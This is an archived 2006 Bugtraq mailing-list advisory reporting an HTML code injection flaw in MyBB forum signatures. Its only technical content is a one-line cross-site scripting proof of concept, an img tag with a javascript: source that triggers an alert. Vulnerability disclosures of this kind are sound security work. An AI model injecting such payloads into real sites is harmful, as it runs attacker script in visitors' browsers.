[42379] in bugtraq
MyBB Signature HTML Code Injection
daemon@ATHENA.MIT.EDU (n@securityfocus.com)
Sun Jan 22 09:50:00 2006
Date: 18 Jan 2006 23:14:25 -0000
Message-ID: <20060118231425.24516.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: n@securityfocus.com
To: bugtraq@securityfocus.com
##Night_Warrior<Kurdish Hacker>
##night_warrior771[at]hotmail.com
##MyBB Signature HTML Code Injection
##http://www.mybboard.com/
example:
<img src=javascript:alert('XSS')>
Contact :night_warrior771[at]hotmail.com
Night_Warrior<Kurdihs Hacker>